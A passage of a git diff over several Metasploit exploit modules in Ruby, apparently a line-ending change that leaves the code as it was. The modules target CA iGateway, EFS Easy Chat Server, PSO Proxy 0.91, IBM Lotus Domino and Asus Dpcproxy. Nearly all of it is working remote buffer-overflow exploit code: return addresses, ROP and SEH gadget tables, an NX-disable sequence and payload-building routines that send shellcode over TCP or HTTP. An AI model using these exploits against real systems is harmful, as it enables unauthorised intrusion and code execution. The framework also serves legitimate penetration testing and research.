"\x32\x44\x24\x24" # XOR AL,BYTE PTR SS:[ESP+24] + buf << "\x49\x49" # DEC ECX + buf << "\x31\x48\x34" # XOR DWORD PTR DS:[EAX+34],ECX + buf << "\x58"*11 # POP EAX + buf << "\x42"*66 + buf << "\x3c"*4 + buf << "\x42"*48 + buf << [ target['Rets'][1] ].pack('V') + + req = "\xff\xff\xff\xff\x02" + "getinfo " + buf + req << "\r\n\r\n" + make_nops(32) + payload.encoded + + udp_sock.put(req) + + handler + disconnect_udp + end + +end diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index 2a1438b653..e3c14774b0 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb 
+++ b/modules/exploits/windows/http/ca_igateway_debug.rb 
@@ -1,93 +1,93 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - - +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + + class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking - + include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'CA iTechnology iGateway Debug Mode Buffer Overflow', - 'Description' => %q{ - This module exploits a vulnerability in the Computer Associates - iTechnology iGateway component. When True is enabled - in igateway.conf (non-default), it is possible to overwrite the stack - and execute code remotely. This module works best with Ordinal payloads. 
- }, - 'Author' => 'patrick', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2005-3190' ], - [ 'OSVDB', '19920' ], - [ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ], - [ 'URL', 'http://www.milw0rm.com/exploits/1243' ], - [ 'BID', '15025' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - }, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00\x0a\x0d\x20", - 'StackAdjustment' => -3500, - 'Compat' => - { - 'ConnectionType' => '+ws2ord', - }, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll - ], - 'Privileged' => true, - 'DisclosureDate' => 'Oct 06 2005', - 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(5250), - ], self.class) - end - - def check - connect - sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n") - banner = sock.get(-1,3) - - if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique? - return Exploit::CheckCode::Detected - end - return Exploit::CheckCode::Safe - end - - def exploit - connect - - seh = generate_seh_payload(target.ret) - buffer = Rex::Text.rand_text_alphanumeric(5000) - buffer[1082, seh.length] = seh - sploit = "GET /" + buffer + " HTTP/1.0" - - sock.put(sploit + "\r\n\r\n\r\n") - - disconnect - handler - end + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CA iTechnology iGateway Debug Mode Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability in the Computer Associates + iTechnology iGateway component. When True is enabled + in igateway.conf (non-default), it is possible to overwrite the stack + and execute code remotely. This module works best with Ordinal payloads. 
+ }, + 'Author' => 'patrick', + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2005-3190' ], + [ 'OSVDB', '19920' ], + [ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ], + [ 'URL', 'http://www.milw0rm.com/exploits/1243' ], + [ 'BID', '15025' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'seh', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x0a\x0d\x20", + 'StackAdjustment' => -3500, + 'Compat' => + { + 'ConnectionType' => '+ws2ord', + }, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll + ], + 'Privileged' => true, + 'DisclosureDate' => 'Oct 06 2005', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(5250), + ], self.class) + end + + def check + connect + sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n") + banner = sock.get(-1,3) + + if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique? + return Exploit::CheckCode::Detected + end + return Exploit::CheckCode::Safe + end + + def exploit + connect + + seh = generate_seh_payload(target.ret) + buffer = Rex::Text.rand_text_alphanumeric(5000) + buffer[1082, seh.length] = seh + sploit = "GET /" + buffer + " HTTP/1.0" + + sock.put(sploit + "\r\n\r\n\r\n") + + disconnect + handler + end end diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 142645b1a2..774fd7b578 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb 
@@ -1,90 +1,90 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::Seh - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow', - 'Description' => %q{ - This module exploits a stack overflow in EFS Software Easy Chat Server. By - sending a overly long authentication request, an attacker may be able to execute - arbitrary code. 
- }, - 'Author' => [ 'LSO ' ], - 'License' => BSD_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2004-2466' ], - [ 'OSVDB', '7416' ], - [ 'BID', '25328' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Privileged' => true, - 'Payload' => - { - 'Space' => 500, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k - ], - 'DisclosureDate' => 'Aug 14 2007', - 'DefaultTarget' => 0)) - - register_options( [ Opt::RPORT(80) ], self.class ) - end - - def check - res = send_request_raw - - if res and res['Server'] =~ /Easy Chat Server\/1.0/ - return Exploit::CheckCode::Appears - end - - return Exploit::CheckCode::Safe - end - - def exploit - # randomize some values. - val = rand_text_alpha(rand(10) + 1) - num = rand_text_numeric(1) - - # exploit buffer. - filler = rand_text_alpha(216) - seh = generate_seh_payload(target.ret) - juju = filler + seh - - uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#{val}=#{num}" - - print_status("Trying target #{target.name}...") - - send_request_raw({'uri' => uri}, 5) - - handler - disconnect - end - -end - + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow', + 'Description' => %q{ + This module exploits a stack overflow in EFS Software Easy Chat Server. By + sending a overly long authentication request, an attacker may be able to execute + arbitrary code. 
+ }, + 'Author' => [ 'LSO ' ], + 'License' => BSD_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2004-2466' ], + [ 'OSVDB', '7416' ], + [ 'BID', '25328' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 500, + 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k + ], + 'DisclosureDate' => 'Aug 14 2007', + 'DefaultTarget' => 0)) + + register_options( [ Opt::RPORT(80) ], self.class ) + end + + def check + res = send_request_raw + + if res and res['Server'] =~ /Easy Chat Server\/1.0/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + # randomize some values. + val = rand_text_alpha(rand(10) + 1) + num = rand_text_numeric(1) + + # exploit buffer. + filler = rand_text_alpha(216) + seh = generate_seh_payload(target.ret) + juju = filler + seh + + uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#{val}=#{num}" + + print_status("Trying target #{target.name}...") + + send_request_raw({'uri' => uri}, 5) + + handler + disconnect + end + +end + diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index c31429d52f..069d0c15b6 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb 
@@ -1,91 +1,91 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - - +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + + class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking - + include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'PSO Proxy v0.91 Stack Overflow', - 'Description' => %q{ - This module exploits a buffer overflow in the PSO Proxy v0.91 web server. - If a client sends an excessively long string the stack is overwritten. - }, - 'Author' => 'Patrick Webster ', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2004-0313' ], - [ 'OSVDB', '4028' ], - [ 'URL', 'http://www.milw0rm.com/exploits/156' ], - [ 'BID', '9706' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Payload' => - { - 'Space' => 370, - 'BadChars' => "\x00\x0a\x0d\x20", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - # Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en. 
- [ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll - [ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll - [ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll - [ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll - [ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll - ], - 'Privileged' => false, - 'DisclosureDate' => 'Feb 20 2004', - 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(8080), - ], self.class) - end - - def autofilter - false - end - - def check - connect - sock.put("GET / HTTP/1.0\r\n\r\n") - banner = sock.get(-1,3) - if (banner =~ /PSO Proxy 0\.9/) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe - end - - def exploit - connect - - exploit = rand_text_alphanumeric(1024, payload_badchars) - exploit += [target['Ret']].pack('V') + payload.encoded - - sock.put(exploit + "\r\n\r\n") - - disconnect - handler - end + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PSO Proxy v0.91 Stack Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in the PSO Proxy v0.91 web server. + If a client sends an excessively long string the stack is overwritten. + }, + 'Author' => 'Patrick Webster ', + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2004-0313' ], + [ 'OSVDB', '4028' ], + [ 'URL', 'http://www.milw0rm.com/exploits/156' ], + [ 'BID', '9706' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 370, + 'BadChars' => "\x00\x0a\x0d\x20", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + # Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en. 
+ [ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll + [ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll + [ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll + [ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll + [ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll + ], + 'Privileged' => false, + 'DisclosureDate' => 'Feb 20 2004', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8080), + ], self.class) + end + + def autofilter + false + end + + def check + connect + sock.put("GET / HTTP/1.0\r\n\r\n") + banner = sock.get(-1,3) + if (banner =~ /PSO Proxy 0\.9/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + + def exploit + connect + + exploit = rand_text_alphanumeric(1024, payload_badchars) + exploit += [target['Ret']].pack('V') + payload.encoded + + sock.put(exploit + "\r\n\r\n") + + disconnect + handler + end end diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index a2bbae9fac..412f972152 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb 
@@ -1,161 +1,161 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ -## - - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'IBM Lotus Domino Web Server Accept-Language Stack Overflow', - 'Description' => %q{ - This module exploits a stack overflow in IBM Lotus Domino Web Server - prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP - request with an Accept-Language header greater than 114 bytes. 
- }, - 'Author' => [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - ['CVE', '2008-2240'], - ['OSVDB', '45415'], - ['BID', '29310'], - ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, - 'Privileged' => true, - 'Payload' => - { - 'Space' => 800, - 'BadChars' => "\x00\x0a\x20\x2c\x3b", - 'StackAdjustment' => -3500, - }, - 'Platform' => 'win', - 'Targets' => - [ - - ['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)', - { - 'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll - 'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll - 'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll - 'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dl - 'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll - 'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll - } - ], - - ['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)', - { - 'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll - 'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll - 'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll - 'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dll - 'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll - 'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll - } - ], - - ['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)', - { - 'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll - 'JmpESP' => 0x62c6072e, # jmp esp @lsccstr.dll - } - ], - - ['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)', - { - 'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll - 'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll - 'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll - 'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll - 'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll - 'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll - } - ], - - ['Lotus 
Domino 8.0 on Windows 2003 SP2 English(NX)', - { - 'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll - 'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll - 'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll - 'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll - 'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll - 'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll - } - ], - - ['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)', - { - 'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll - 'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll - } - ], - - ], - 'DisclosureDate' => 'May 20 2008')) - - register_options( [ Opt::RPORT(80) ], self.class ) - end - - def exploit - connect - - lang = rand_text_alphanumeric(116) # greetz to hateful chris - lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi) - lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax) - lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash - lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1 - lang << "\x00" - lang << payload.encoded - - if(not target['DisableNX']) - lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4 - lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2 - lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top - else - lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8 - lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2 - lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3 - lang[ 88, 4 ] = [target['Ret']].pack('V') # 4 - lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6 - lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top - lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5 - end - - uri = rand_text_alpha_lower(16) + '.nsf?' 
+ rand_text_highascii(1) # Trigger - - print_status("Trying target #{target.name}...") - send_request_raw({ - 'uri' => "#{uri}", - 'method' => 'GET', - 'headers' => - { - 'Accept' => '*/*', - 'Accept-Language' => "#{lang}", - 'Accept-Encoding' => 'gzip,deflate', - 'Keep-Alive' => '300', - 'Connection' => 'keep-alive', - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', - } - }, 5) - handler - disconnect - end -end + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'IBM Lotus Domino Web Server Accept-Language Stack Overflow', + 'Description' => %q{ + This module exploits a stack overflow in IBM Lotus Domino Web Server + prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP + request with an Accept-Language header greater than 114 bytes. + }, + 'Author' => [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + ['CVE', '2008-2240'], + ['OSVDB', '45415'], + ['BID', '29310'], + ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 800, + 'BadChars' => "\x00\x0a\x20\x2c\x3b", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + + ['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)', + { + 'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll + 'FixESI' => 0x603055da, # push esp, pop esi, ret @nnotes.dll + 'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll + 'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dl + 'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll + 'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll + } + ], + + ['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)', + { + 'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll + 'FixESI' => 0x603055da, # push esp, pop esi, ret 
@nnotes.dll + 'FixEBP' => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll + 'Ret' => 0x62c838c7, # ret 0x12e @nlsccstr.dll + 'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll + 'JmpESP' => 0x62c6072e, # jmp esp @nlsccstr.dll + } + ], + + ['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)', + { + 'FixESP' => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll + 'JmpESP' => 0x62c6072e, # jmp esp @lsccstr.dll + } + ], + + ['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)', + { + 'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll + 'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll + 'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll + 'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll + 'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll + 'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll + } + ], + + ['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)', + { + 'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll + 'FixESI' => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll + 'FixEBP' => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll + 'Ret' => 0x7f8b0628, # ret 0x12e @j9gc23.dll + 'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll + 'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll + } + ], + + ['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)', + { + 'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll + 'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll + } + ], + + ], + 'DisclosureDate' => 'May 20 2008')) + + register_options( [ Opt::RPORT(80) ], self.class ) + end + + def exploit + connect + + lang = rand_text_alphanumeric(116) # greetz to hateful chris + lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi) + lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax) + lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash + lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1 + lang << "\x00" + lang << payload.encoded + + if(not target['DisableNX']) + lang[ 16, 15 ] = 
Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4 + lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2 + lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top + else + lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8 + lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2 + lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3 + lang[ 88, 4 ] = [target['Ret']].pack('V') # 4 + lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6 + lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top + lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5 + end + + uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1) # Trigger + + print_status("Trying target #{target.name}...") + send_request_raw({ + 'uri' => "#{uri}", + 'method' => 'GET', + 'headers' => + { + 'Accept' => '*/*', + 'Accept-Language' => "#{lang}", + 'Accept-Encoding' => 'gzip,deflate', + 'Keep-Alive' => '300', + 'Connection' => 'keep-alive', + 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', + } + }, 5) + handler + disconnect + end +end diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index f80f93a653..3de2519164 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb 
@@ -1,75 +1,75 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' - - +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' + + class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking - + include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Asus Dpcproxy Buffer Overflow', - 'Description' => %q{ - This module exploits a stack overflow in Asus Dpcroxy version 2.0.0.19. - It should be vulnerable until version 2.0.0.24. - Credit to Luigi Auriemma - }, - 'Author' => 'Jacopo Cervini', - 'Version' => '$Revision$', - 'References' => - [ - [ 'CVE', '2008-1491' ], - [ 'OSVDB', '43638' ], - [ 'BID', '28394' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'Space' => 400, - 'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff", - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Asus Dpcroxy version 2.00.19 Universal', { 'Ret' => 0x0040273b } ], # p/p/r - ], - 'Privileged' => true, - 'DefaultTarget' => 0, - 'DisclosureDate' => 'March 21 2008')) - - register_options([Opt::RPORT(623)], self.class) - - end - - def exploit - connect - - sploit = make_nops(0x38a - payload.encoded.length)+ payload.encoded + rand_text_english(6032) - sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) - sploit << [target.ret].pack('V') + make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string #jmp back - sploit << make_nops(50) - - print_status("Trying 
target #{target.name}...") - sock.put(sploit) - sleep(3) # =( - - handler - disconnect - end - + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Asus Dpcproxy Buffer Overflow', + 'Description' => %q{ + This module exploits a stack overflow in Asus Dpcroxy version 2.0.0.19. + It should be vulnerable until version 2.0.0.24. + Credit to Luigi Auriemma + }, + 'Author' => 'Jacopo Cervini', + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2008-1491' ], + [ 'OSVDB', '43638' ], + [ 'BID', '28394' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Asus Dpcroxy version 2.00.19 Universal', { 'Ret' => 0x0040273b } ], # p/p/r + ], + 'Privileged' => true, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'March 21 2008')) + + register_options([Opt::RPORT(623)], self.class) + + end + + def exploit + connect + + sploit = make_nops(0x38a - payload.encoded.length)+ payload.encoded + rand_text_english(6032) + sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + sploit << [target.ret].pack('V') + make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string #jmp back + sploit << make_nops(50) + + print_status("Trying target #{target.name}...") + sock.put(sploit) + sleep(3) # =( + + handler + disconnect + end + end diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index d7772d4c21..4f108a83a9 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb 
